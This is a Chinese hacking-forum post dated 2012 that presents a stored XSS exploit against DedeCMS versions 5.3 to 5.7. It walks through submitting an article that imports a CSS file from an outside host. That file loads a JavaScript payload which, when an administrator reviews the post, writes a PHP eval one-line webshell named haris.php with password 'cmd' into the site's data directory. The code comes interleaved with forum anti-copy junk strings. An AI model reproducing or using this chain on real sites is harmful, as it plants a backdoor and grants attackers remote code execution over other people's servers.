中国网络渗透测试联盟
标题:
dedecms xss oday通杀所有版本 可getshell
[打印本页]
作者:
admin
时间:
2012-9-15 13:56
标题:
dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
! F( u4 {) S6 n c2 r
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
( Q& F8 L& F1 |0 s5 R* J/ ?
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
: ]% T8 j" [2 B7 h( _; d
下面说说利用方法。
# I3 d) x/ G* V. y
条件有2个:
, B7 `, Q) e% d* F' E! P- l& X1 a0 c2 o
1.开启注册
# l) Z% m. N2 U, q
2.开启投稿
4 P# Z$ X: Q. q
注册会员----发表文章
# W9 j. I3 }8 M, t0 y
内容填写:
) I+ z* J. R- h# s* u
复制代码
: ~* C5 b- U- T. \" H! f; d0 R
<style>@im\port'\
http://xxx.com/xss.css';
</style>
9 B6 }+ h# Q) C* g& Q; v& Y
新建XSS.Css
7 ?6 }) v( ]$ a* q5 X
复制代码
# O- }4 y9 k% e1 n" Z! i( b' z
.body{
. b5 E& w8 p* a% P5 w$ e
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
7 L1 ^ p; A Y# q
新建xss.js 内容为
3 \9 g$ L3 z+ H5 |" H
复制代码
4 W9 y+ c' g2 {. J# e0 r, a
1.var request = false;
7 b; D1 P/ b2 S! r2 Y: b5 ^* e5 |
2.if(window.XMLHttpRequest) {
2 }% z8 a$ e& R3 a1 X, H5 w6 y
3.request = new XMLHttpRequest();
) O- g, Q5 a8 A
4.if(request.overrideMimeType) {
/ e& U! R$ b' ] g5 ~
5.request.overrideMimeType('text/xml');
( z$ |/ R# R# t
6.}
* b& F3 }$ h! A5 j f0 d2 ~$ r
7.} else if(window.ActiveXObject) {
9 D1 \/ M# t2 a, r8 R1 S( v8 C& H7 S
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
% K+ J7 n0 w! M4 u& E+ p; |. A
9.for(var i=0; i<versions.length; i++) {
# r% F v: v* a3 L2 T# S. c* \
10.try {
: B: u2 s2 U& e5 h
11.request = new ActiveXObject(versions);
# M: L- j+ d Y3 o$ V+ o
12.} catch(e) {}
% M% A4 h9 B/ z4 s
13.}
2 A `, U8 `! B* _4 S4 ]
14.}
( d* ]" }6 e% V
15.xmlhttp=request;
: N- l. H2 Q! W9 M1 A
16.function getFolder( url ){
) H+ x1 y ?7 m# `% r$ l
17. obj = url.split('/')
) i, `: K* }$ |# B: A
18. return obj[obj.length-2]
z8 } z, N- S$ O1 V4 S; k
19.}
, n5 x7 w; W5 i# ~
20.oUrl = top.location.href;
+ M3 _9 I+ r/ y. V [. A
21.u = getFolder(oUrl);
0 y" M6 E2 p9 x" K! W# X1 v, I
22.add_admin();
$ R( v8 w/ s v, @ B; S( ]
23.function add_admin(){
$ V5 e! k3 U4 B; X& ]
24.var url= "/"+u+"/sys_sql_query.php";
0 Q6 k; E! a2 P k0 S
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
: ~0 Q7 l5 W) V$ t1 J4 d( H1 L
26.xmlhttp.open("POST", url, true);
' `! l* O8 X" G3 J- ^1 p' k
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
9 E y6 H2 B( f5 p- F' `- r' _6 d
28.xmlhttp.setRequestHeader("Content-length", params.length);
0 W0 u: V. P; l; q$ l* ~/ o
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
2 j' Q2 k' J! C6 U
30.xmlhttp.send(params);
7 ?3 c" |. D( u! t" w; h
31.}
$ I) H, g. x& H q5 T
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2